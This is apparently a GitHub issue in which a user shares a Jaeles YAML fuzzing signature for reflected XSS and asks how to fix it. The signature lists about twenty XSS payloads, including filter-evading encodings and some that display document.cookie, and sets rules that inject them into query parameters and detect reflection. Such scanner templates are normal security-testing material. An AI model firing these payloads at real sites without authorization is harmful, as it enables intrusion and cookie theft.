jaeles-signatures

help

Open Kalimon12 opened this issue 3 years ago • 0 comments

fuzz xss

```yaml
id: xss-reflected
type: fuzz
level: 1
info:
  name: XSS Fuzz on Param Basic
  risk: high

payloads:
  - '<svg%20onx=()%20onload=(confirm)(123)>'
  - ''
  - '"><svg/onload=alert(1337)>'
  - '<svg/onload=alert(1)'
  - ''
  - '%22><svg%20onload=confirm(1);>'
  - '"><svg/onload=alert(document.cookie)>'
  - ''
  - "onx+%00+onpointerenter%3dalert(domain)+x"
  - '<svgononload=( alert )( document.domain )>'
  - '/alert?.(1)%27"><Svg/OnLoad=%27'
  - 'test",prompt%0A/HelloWorld/(document.domain)'
  - ''
  - '<svg%0Aonauxclick=0;[1].some(confirm)//%20(1/4)'
  - '<svg%0Aonauxclick=0;[1].some(confirm)//%20(1/4)'
  - '<a"/onclick=(confirm)(document.cookie)>Click%20Here!'
  - '<svgononload=(%20alert%20)(%20document.domain%20)>'
  - 'onx+%00+onpointerenter%3dalert(domain)+x'
  - '<x/onclick=globalThis[%27\u0070r\u006f%27+%27mpt%27]<)>clickme'
  - 'javascript:https//www.google.com#%0aalert()'
  - '"><img%20src=x%20onerror=alert(1)>'
  - '%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E'

requests:
  - generators:
      - Query("{{.payload}}")
    detections:
      StringSearch("resHeaders", "text/html") && StringSearch("response", "{{.payload}}") && (StatusCode() == 200)
```

how fix

Kalimon12, Aug 15 '21 15:08